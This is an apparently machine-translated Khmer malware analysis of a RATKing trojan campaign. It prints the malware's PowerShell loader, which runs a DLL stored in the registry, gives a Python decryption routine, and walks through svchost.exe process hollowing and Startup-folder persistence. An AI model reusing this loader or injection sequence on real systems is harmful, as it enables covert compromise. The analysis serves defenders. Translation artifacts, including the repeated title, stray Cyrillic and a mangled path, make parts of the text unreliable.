RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž’αžΆαžαž»αžŠαŸ‚αž›αž”αžΆαž“αž’αŸ’αžœαžΎαž‘αžΎαž„αž“αŸ…αž€αŸ’αž“αž»αž„αž”αž‰αŸ’αž‡αžΈαžˆαŸ’αž˜αŸ„αŸ‡αžŠαŸ„αž™αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS

αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž‘αžΈ 3. αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαž“αŸƒαž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL

αž“αŸ…αžŠαŸ†αžŽαžΆαž€αŸ‹αž€αžΆαž›αž‘αžΈαž”αžΈ DLL αž–αŸ’αž™αžΆαž”αžΆαž‘αž”αžΆαž“αž•αŸ’αž‘αž»αž€αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™ αž”αž‰αŸ’αž…αžΌαž›αžœαžΆαž‘αŸ…αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αŸ’αžšαž–αŸαž“αŸ’αž’ αž“αž·αž„αž’αžΆαž“αžΆαžαžΆαžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžŠαŸ„αž™αžŸαŸ’αžœαŸαž™αž”αŸ’αžšαžœαžαŸ’αžαž·αž“αŸ…αž–αŸαž›αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž…αžΌαž›αŸ”

αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžαžΆαž˜αžšαž™αŸˆ PowerShell

DLL αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αžŠαŸ„αž™αž”αŸ’αžšαžΎαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸ…αž€αŸ’αž“αž»αž„ PowerShellαŸ–

[System.Threading.Thread]::GetDomain().Load((ItemProperty HKCU:///Software///<rnd_sub_key_name> ).<rnd_value_name>);
[GUyyvmzVhebFCw]::EhwwK('WScript.ScriptFullName', 'rWZlgEtiZr', 'WScript.ScriptName'),0

αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž“αŸαŸ‡αž”αžΆαž“αž’αŸ’αžœαžΎαžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸˆ

  • αž”αžΆαž“αž‘αž‘αž½αž›αž‘αž·αž“αŸ’αž“αž“αŸαž™αžαž˜αŸ’αž›αŸƒαž…αž»αŸ‡αž”αž‰αŸ’αž‡αžΈαž‡αžΆαž˜αž½αž™αžˆαŸ’αž˜αŸ„αŸ‡ rnd_value_name β€” αž‘αž·αž“αŸ’αž“αž“αŸαž™αž“αŸαŸ‡αž‚αžΊαž‡αžΆαž―αž€αžŸαžΆαžš DLL αžŠαŸ‚αž›αžŸαžšαžŸαŸαžšαž“αŸ…αž›αžΎαžœαŸαž‘αž·αž€αžΆ .Net αŸ”
  • αž•αŸ’αž‘αž»αž€αž˜αŸ‰αžΌαžŒαž»αž› .Net αž›αž‘αŸ’αž’αž•αž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž’αž„αŸ’αž‚αž…αž„αž…αžΆαŸ†αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš powershell.exe αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš [System.Threading.Thread]::GetDomain().Load() (αž€αžΆαžšαž–αž·αž–αžŽαŸŒαž“αžΆαž›αž˜αŸ’αž’αž·αžαž“αŸƒαž’αž“αž»αž‚αž˜αž“αŸ Load() αž˜αžΆαž“αž“αŸ…αž›αžΎαž‚αŸαž αž‘αŸ†αž–αŸαžš Microsoft);
  • αž”αžΆαž“αž’αž“αž»αžœαžαŸ’αžαž˜αž»αžαž„αžΆαžš GUyyvmzVhebFCw]::EhwwK() - αž€αžΆαžšαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL αž”αžΆαž“αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αž‡αžΆαž˜αž½αž™αžœαžΆ - αž‡αžΆαž˜αž½αž™αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš vbsScriptPath, xorKey, vbsScriptName. αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš xorKey αž”αžΆαž“αžšαž€αŸ’αžŸαžΆαž‘αž»αž€αžŸαŸ„αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αžΆαžšαžŒαž·αž‚αŸ’αžšαžΈαž”αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™ αž“αž·αž„αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš vbsScriptPath ΠΈ vbsScriptName αžαŸ’αžšαžΌαžœαž”αžΆαž“αž•αŸ’αž‘αŸαžšαžŠαžΎαž˜αŸ’αž”αžΈαž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αž“αŸ…αž€αŸ’αž“αž»αž„ autorun αŸ”

αž€αžΆαžšαž–αž·αž–αžŽαŸŒαž“αžΆαž’αŸ†αž–αžΈαž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL

αž“αŸ…αž€αŸ’αž“αž»αž„αž‘αž˜αŸ’αžšαž„αŸ‹ decompiled αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž…αžΆαž”αŸ‹αž•αŸ’αžŠαžΎαž˜αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž˜αžΎαž›αž‘αŸ…αžŠαžΌαž…αž“αŸαŸ‡αŸ–

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž•αŸ’αž‘αž»αž€αž‘αž·αž“αŸ’αž“αž“αŸαž™αž€αŸ’αž“αž»αž„αž‘αž˜αŸ’αžšαž„αŸ‹αžŠαŸ‚αž›αž”αžΆαž“αž”αŸ†αž”αŸ‚αž€ (αž˜αž»αžαž„αžΆαžšαžŠαŸ‚αž›αž€αžΆαžšαž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžŽαŸ’αžŽαžΆαž›αŸαž™ DLL αž”αžΆαž“αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžαŸ’αžšαžΌαžœαž”αžΆαž“αž‚αžΌαžŸαž”αž‰αŸ’αž‡αžΆαž€αŸ‹αž‡αžΆαž–αžŽαŸŒαž€αŸ’αžšαž αž˜)

αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž…αžΆαž”αŸ‹αž•αŸ’αžŠαžΎαž˜αž”αŸ’αžšαž–αŸαž“αŸ’αž’αžαŸ’αžšαžΌαžœαž”αžΆαž“αž€αžΆαžšαž–αžΆαžšαžŠαŸ„αž™ .Net Reactor protectorαŸ” αž§αž”αž€αžšαžŽαŸαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ de4dot αž’αŸ’αžœαžΎαž€αžΆαžšαž„αžΆαžšαžŠαŸαž›αŸ’αž’αž€αŸ’αž“αž»αž„αž€αžΆαžšαžŠαž€αž§αž”αž€αžšαžŽαŸαž€αžΆαžšαž–αžΆαžšαž“αŸαŸ‡αŸ”

αž§αž”αž€αžšαžŽαŸαž•αŸ’αž‘αž»αž€αž“αŸαŸ‡αŸ–

  • αž”αž‰αŸ’αž…αžΌαž›αž”αž“αŸ’αž‘αž»αž€αž‘αŸ…αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αŸ’αžšαž–αŸαž“αŸ’αž’ (αž€αŸ’αž“αž»αž„αž§αž‘αžΆαž αžšαžŽαŸαž“αŸαŸ‡ αžœαžΆαŸ” svchost.exe);
  • αžαŸ’αž‰αž»αŸ†αž”αžΆαž“αž”αž“αŸ’αžαŸ‚αž˜αžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αžŠαžΎαž˜αŸ’αž”αžΈαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžŠαŸ„αž™αžŸαŸ’αžœαŸαž™αž”αŸ’αžšαžœαžαŸ’αžαž·αŸ”

αž€αžΆαžšαž…αžΆαž€αŸ‹αž”αž“αŸ’αž‘αž»αž€

αžŸαžΌαž˜αž€αŸ’αžšαž‘αŸαž€αž˜αžΎαž›αž˜αž»αžαž„αžΆαžšαžŠαŸ‚αž›αžŸαŸ’αž‚αŸ’αžšαžΈαž” PowerShell αž αŸ…αžαžΆαŸ”

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž˜αž»αžαž„αžΆαžšβ€‹αž αŸ…β€‹αžŠαŸ„αž™β€‹αžŸαŸ’αž‚αŸ’αžšαžΈαž” PowerShell

αž˜αž»αžαž„αžΆαžšαž“αŸαŸ‡αž’αž“αž»αžœαžαŸ’αžαžŸαž€αž˜αŸ’αž˜αž—αžΆαž–αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸˆ

  • αžŒαž·αž‚αŸ’αžšαžΈαž”αžŸαŸ†αžŽαž»αŸ†αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΈαžš (array ΠΈ array2 αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹) αŸ” αž–αž½αž€αžœαžΆαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αž„αŸ’αž αžΆαž”αŸ‹αžŠαŸ†αž”αžΌαž„αžŠαŸ„αž™αž”αŸ’αžšαžΎ gzip αž“αž·αž„αž”αžΆαž“αž’αŸŠαž·αž“αž‚αŸ’αžšαžΈαž”αž‡αžΆαž˜αž½αž™αž€αŸ’αž”αž½αž“αžŠαŸ„αŸ‡αžŸαŸ’αžšαžΆαž™ XOR αž‡αžΆαž˜αž½αž™αž“αžΉαž„αžŸαŸ„ xorKey;
  • αž”αžΆαž“αž…αž˜αŸ’αž›αž„αž‘αž·αž“αŸ’αž“αž“αŸαž™αž‘αŸ…αžαŸ†αž”αž“αŸ‹αž’αž„αŸ’αž‚αž…αž„αž…αžΆαŸ†αžŠαŸ‚αž›αž”αžΆαž“αž”αŸ‚αž„αž…αŸ‚αž€αŸ” αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΈ array - αž‘αŸ…β€‹αžαŸ†αž”αž“αŸ‹β€‹αž…αž„αž…αžΆαŸ†β€‹αžŠαŸ‚αž›β€‹αž”αžΆαž“β€‹αž…αž„αŸ’αž’αž»αž›β€‹αž‘αŸ…β€‹ intPtr (payload pointer αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹); αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΈ array2 - αž‘αŸ…β€‹αžαŸ†αž”αž“αŸ‹β€‹αž…αž„αž…αžΆαŸ†β€‹αžŠαŸ‚αž›β€‹αž”αžΆαž“β€‹αž…αž„αŸ’αž’αž»αž›β€‹αž‘αŸ…β€‹ intPtr2 (shellcode pointer αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹);
  • αž αŸ…αžαžΆαž˜αž»αžαž„αžΆαžš CallWindowProcA (αž€αžΆαžšαž–αž·αž–αžŽαŸŒαž“αžΆ αž˜αž»αžαž„αžΆαžšαž“αŸαŸ‡αž˜αžΆαž“αž“αŸ…αž›αžΎαž‚αŸαž αž‘αŸ†αž–αŸαžš Microsoft) αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαžαžΆαž„αž€αŸ’αžšαŸ„αž˜ (αžˆαŸ’αž˜αŸ„αŸ‡αž“αŸƒαž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαžαŸ’αžšαžΌαžœαž”αžΆαž“αžšαžΆαž™αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹αž–αž½αž€αž‚αŸαžŸαŸ’αžαž·αžαž“αŸ…αž€αŸ’αž“αž»αž„αž›αŸ†αžŠαžΆαž”αŸ‹αžŠαžΌαž…αž‚αŸ’αž“αžΆαž”αŸ‰αž»αž“αŸ’αžαŸ‚αž‡αžΆαž˜αž½αž™αž“αžΉαž„αžαž˜αŸ’αž›αŸƒαž€αžΆαžšαž„αžΆαžš):
    • lpPrevWndFunc - αž…αž„αŸ’αž’αž»αž›αž‘αŸ…αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΈ array2;
    • hWnd - αž…αž„αŸ’αž’αž»αž›αž‘αŸ…αžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαžŠαŸ‚αž›αž˜αžΆαž“αž•αŸ’αž›αžΌαžœαž‘αŸ…αž€αžΆαž“αŸ‹αž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž’αžΆαž…αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžΆαž“αŸ” svchost.exe;
    • Msg - αž…αž„αŸ’αž’αž»αž›αž‘αŸ…αž‘αž·αž“αŸ’αž“αž“αŸαž™αž–αžΈ array;
    • wParamlParam - αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαžŸαžΆαžš (αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž“αŸαŸ‡αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαž‘αžΆαŸ†αž„αž“αŸαŸ‡αž˜αž·αž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžΎαž“αž·αž„αž˜αžΆαž“αžαž˜αŸ’αž›αŸƒ 0);
  • αž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαž―αž€αžŸαžΆαžšαž˜αž½αž™αŸ” %AppData%MicrosoftWindowsStart MenuProgramsStartup<name>.urlαžŠαŸ‚αž›αž‡αžΆαž€αž“αŸ’αž›αŸ‚αž„ <name> - αž‘αžΆαŸ†αž„αž“αŸαŸ‡αž‚αžΊαž‡αžΆαžαž½αž’αž€αŸ’αžŸαžš 4 αžŠαŸ†αž”αžΌαž„αž“αŸƒαž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš vbsScriptName (αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹ αž”αŸ†αžŽαŸ‚αž€αž€αžΌαžŠαž‡αžΆαž˜αž½αž™αž“αžΉαž„αžŸαž€αž˜αŸ’αž˜αž—αžΆαž–αž“αŸαŸ‡αž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αžŠαŸ„αž™αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆ File.Copy) αžαžΆαž˜αžœαž·αž’αžΈαž“αŸαŸ‡ αž˜αŸαžšαŸ„αž‚αž”αžΆαž“αž”αž“αŸ’αžαŸ‚αž˜αž―αž€αžŸαžΆαžš URL αž‘αŸ…αž€αŸ’αž“αž»αž„αž”αž‰αŸ’αž‡αžΈαž―αž€αžŸαžΆαžš autorun αž“αŸ…αž–αŸαž›αžŠαŸ‚αž›αž’αŸ’αž“αž€αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž”αžΆαž“αž…αžΌαž› αž αžΎαž™αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž”αžΆαž“αž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αž€αž»αŸ†αž–αŸ’αž™αžΌαž‘αŸαžšαžŠαŸ‚αž›αž˜αžΆαž“αž˜αŸαžšαŸ„αž‚αŸ” αž―αž€αžŸαžΆαžš URL αž˜αžΆαž“αžαŸ†αžŽαž—αŸ’αž‡αžΆαž”αŸ‹αž‘αŸ…αžŸαŸ’αž‚αŸ’αžšαžΈαž”αŸ–

[InternetShortcut]
URL = file : ///<vbsScriptPath>

αžŠαžΎαž˜αŸ’αž”αžΈαž™αž›αŸ‹αž–αžΈαžšαž”αŸ€αž”αžŠαŸ‚αž›αž€αžΆαžšαž…αžΆαž€αŸ‹αžαŸ’αžšαžΌαžœαž”αžΆαž“αž’αž“αž»αžœαžαŸ’αž αž™αžΎαž„αž”αžΆαž“αžŒαž·αž‚αŸ’αžšαžΈαž”αž’αžΆαžšαŸαž‘αž·αž“αŸ’αž“αž“αŸαž™ array ΠΈ array2. αžŠαžΎαž˜αŸ’αž”αžΈαž’αŸ’αžœαžΎαžŠαžΌαž…αž“αŸαŸ‡αž™αžΎαž„αž”αžΆαž“αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš Python αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

def decrypt(data, key):
    return gzip.decompress(
        bytearray([data[i] ^ key[i % len(key)] for i in range(len(data))])[4:])
    

αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž™αžΎαž„αž”αžΆαž“αžšαž€αžƒαžΎαž‰αžαžΆ:

  • array αž‚αžΊαž‡αžΆαž―αž€αžŸαžΆαžš PE - αž“αŸαŸ‡αž‚αžΊαž‡αžΆαž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™αŸ”
  • array2 αž‚αžΊβ€‹αž‡αžΆβ€‹αž€αžΌαžŠαžŸαŸ‚αž›β€‹αžŠαŸ‚αž›β€‹αžαž˜αŸ’αžšαžΌαžœβ€‹αž±αŸ’αž™β€‹αž’αŸ’αžœαžΎβ€‹αž€αžΆαžšβ€‹αž…αžΆαž€αŸ‹αŸ”

Shellcode αž–αžΈαž’αžΆαžšαŸαž˜αž½αž™αŸ” array2 αž”αžΆαž“αž†αŸ’αž›αž„αž€αžΆαžαŸ‹αž‡αžΆαžαž˜αŸ’αž›αŸƒαž˜αž»αžαž„αžΆαžš lpPrevWndFunc αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž˜αž»αžαž„αžΆαžšαž˜αž½αž™αŸ” CallWindowProcA. lpPrevWndFunc - αž˜αž»αžαž„αžΆαžš callback αž‚αŸ†αžšαžΌαžšαž”αžŸαŸ‹αžœαžΆαž˜αžΎαž›αž‘αŸ…αžŠαžΌαž…αž“αŸαŸ‡αŸ–

LRESULT WndFunc(
  HWND    hWnd,
  UINT    Msg,
  WPARAM  wParam,
  LPARAM  lParam
);

αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž“αŸ…αž–αŸαž›αž’αŸ’αž“αž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž˜αž»αžαž„αžΆαžš CallWindowProcA αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžš hWnd, Msg, wParam, lParam αž€αžΌαžŠαžŸαŸ‚αž›αž–αžΈαž’αžΆαžšαŸαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž· array2 αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž’αŸ†αžŽαŸ‡αž’αŸ†αžŽαžΆαž„ hWnd ΠΈ Msg. hWnd αž‚αžΊαž‡αžΆαž‘αŸ’αžšαž“αž·αž…αž‘αŸ…αžαŸ’αžŸαŸ‚αž’αž€αŸ’αžŸαžšαžŠαŸ‚αž›αž˜αžΆαž“αž•αŸ’αž›αžΌαžœαž‘αŸ…αž€αžΆαž“αŸ‹αž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž’αžΆαž…αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžΆαž“αŸ” svchost.exeαž“αž·αž„ Msg - αž…αž„αŸ’αž’αž»αž›αž‘αŸ…αž”αž“αŸ’αž‘αž»αž€αž…αž»αž„αž€αŸ’αžšαŸ„αž™αŸ”

αž›αŸαžαž€αžΌαžŠαžŸαŸ‚αž›αž”αžΆαž“αž‘αž‘αž½αž›αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αž˜αž»αžαž„αžΆαžšαž–αžΈ kernel32.dll ΠΈ ntdll32.dll αžŠαŸ„αž™αž•αŸ’αž’αŸ‚αž€αž›αžΎαžαž˜αŸ’αž›αŸƒ hash αž–αžΈαžˆαŸ’αž˜αŸ„αŸ‡αžšαž”αžŸαŸ‹αž–αž½αž€αž‚αŸ αž αžΎαž™αž”αžΆαž“αž”αž‰αŸ’αž…αžΌαž› payload αž…αž»αž„αž€αŸ’αžšαŸ„αž™αž‘αŸ…αž€αŸ’αž“αž»αž„αž’αž„αŸ’αž‚αž…αž„αž…αžΆαŸ†αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš svchost.exeαžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αž…αŸ’αž…αŸαž€αž‘αŸαžŸαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αŸ’αžšαž αŸ„αž„ (αž’αŸ’αž“αž€αž’αžΆαž…αž’αžΆαž“αž”αž“αŸ’αžαŸ‚αž˜αž’αŸ†αž–αžΈαžœαžΆαž“αŸ…αž€αŸ’αž“αž»αž„αž“αŸαŸ‡αŸ” αž’αžαŸ’αžαž”αž‘) αž“αŸ…αž–αŸαž›αž…αžΆαž€αŸ‹αž›αŸαžαž€αžΌαžŠαžŸαŸ‚αž›αŸ–

  • αž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž˜αž½αž™αŸ” svchost.exe αž“αŸ…αž€αŸ’αž“αž»αž„αžŸαŸ’αžαžΆαž“αž—αžΆαž–αž•αŸ’αž’αžΆαž€αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš CreateProcessW;
  • αž”αž“αŸ’αž‘αžΆαž”αŸ‹β€‹αž˜αž€β€‹αž›αžΆαž€αŸ‹β€‹αž€αžΆαžšβ€‹αž”αž„αŸ’αž αžΆαž‰β€‹αž•αŸ’αž“αŸ‚αž€β€‹αž€αŸ’αž“αž»αž„β€‹αž…αž“αŸ’αž›αŸ„αŸ‡β€‹αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“β€‹αžšαž”αžŸαŸ‹β€‹αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš svchost.exe αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš NtUnmapViewOfSection. αžŠαžΌαž…αŸ’αž“αŸαŸ‡αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž”αžΆαž“αžŠαŸ„αŸ‡αž›αŸ‚αž„αž€αžΆαžšαž…αž„αž…αžΆαŸ†αž“αŸƒαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžŠαžΎαž˜ svchost.exeαž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž”αŸ‚αž„αž…αŸ‚αž€αž’αž„αŸ’αž‚αž…αž„αž…αžΆαŸ†αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž”αž“αŸ’αž‘αž»αž€αž“αŸ…αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αž“αŸαŸ‡;
  • αž’αž„αŸ’αž‚αž…αž„αž…αžΆαŸ†αžŠαŸ‚αž›αž”αžΆαž“αž”αŸ‚αž„αž…αŸ‚αž€αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž”αž“αŸ’αž‘αž»αž€αž€αŸ’αž“αž»αž„αž…αž“αŸ’αž›αŸ„αŸ‡αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš svchost.exe αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš VirtualAllocEx;

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž€αžΆαžšαž…αžΆαž”αŸ‹αž•αŸ’αžαžΎαž˜αž“αŸƒαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž…αžΆαž€αŸ‹αžαŸ’αž“αžΆαŸ†

  • αž”αžΆαž“αžŸαžšαžŸαŸαžšαž˜αžΆαžαž·αž€αžΆαž“αŸƒαž”αž“αŸ’αž‘αž»αž€αž‘αŸ…αž€αŸ’αž“αž»αž„αž…αž“αŸ’αž›αŸ„αŸ‡αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš svchost.exe αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš WriteProcessMemory (αžŠαžΌαž…αž“αŸ…αž€αŸ’αž“αž»αž„αžšαžΌαž”αžαžαž’αŸαž€αŸ’αžšαž„αŸ‹αžαžΆαž„αž€αŸ’αžšαŸ„αž˜);
  • αž”αžΆαž“αž”αž“αŸ’αžαžŠαŸ†αžŽαžΎαžšαž€αžΆαžš svchost.exe αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš ResumeThread.

RATKingαŸ– αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžαŸ’αž˜αžΈαž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΈαž…αž˜αŸ’αž„αžΆαž™ Trojan
αž€αžΆαžšαž”αž‰αŸ’αž…αž”αŸ‹αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž…αžΆαž€αŸ‹αžαŸ’αž“αžΆαŸ†

αž˜αŸαžšαŸ„αž‚αžŠαŸ‚αž›αž’αžΆαž…αž‘αžΆαž‰αž™αž€αž”αžΆαž“αŸ”

αž‡αžΆαž›αž‘αŸ’αž’αž•αž›αž“αŸƒαžŸαž€αž˜αŸ’αž˜αž—αžΆαž–αžŠαŸ‚αž›αž”αžΆαž“αž–αž·αž–αžŽαŸŒαž“αžΆ αž˜αŸαžšαŸ„αž‚αž˜αž½αž™αž€αŸ’αž“αž»αž„αž…αŸ†αžŽαŸ„αž˜αž˜αŸαžšαŸ„αž‚ RAT-class αž‡αžΆαž…αŸ’αžšαžΎαž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŠαŸ†αž‘αžΎαž„αž“αŸ…αž›αžΎαž”αŸ’αžšαž–αŸαž“αŸ’αž’αž˜αŸαžšαŸ„αž‚αŸ” αžαžΆαžšαžΆαž„αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αžšαžΆαž™αž”αž‰αŸ’αž‡αžΈαž˜αŸαžšαŸ„αž‚αžŠαŸ‚αž›αž”αŸ’αžšαžΎαž€αŸ’αž“αž»αž„αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžš αžŠαŸ‚αž›αž™αžΎαž„αž’αžΆαž…αž€αŸ†αžŽαžαŸ‹αžŠαŸ„αž™αž‘αŸ†αž“αž»αž€αž…αž·αžαŸ’αžαž…αŸ†αž–αŸ„αŸ‡αž€αŸ’αžšαž»αž˜αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž˜αž½αž™αž€αŸ’αžšαž»αž˜ αž…αžΆαž”αŸ‹αžαžΆαŸ†αž„αž–αžΈαž‚αŸ†αžšαžΌαž”αžΆαž“αž…αžΌαž›αž”αŸ’αžšαžΎαž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαž…αž‚αŸ’αž“αžΆ αž“αž·αž„αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αŸ”

αžˆαŸ’αž˜αŸ„αŸ‡αž˜αŸαžšαŸ„αž‚

αžƒαžΎαž‰αžŠαŸ†αž”αžΌαž„

SHA-256

ស៊ី & ស៊ី

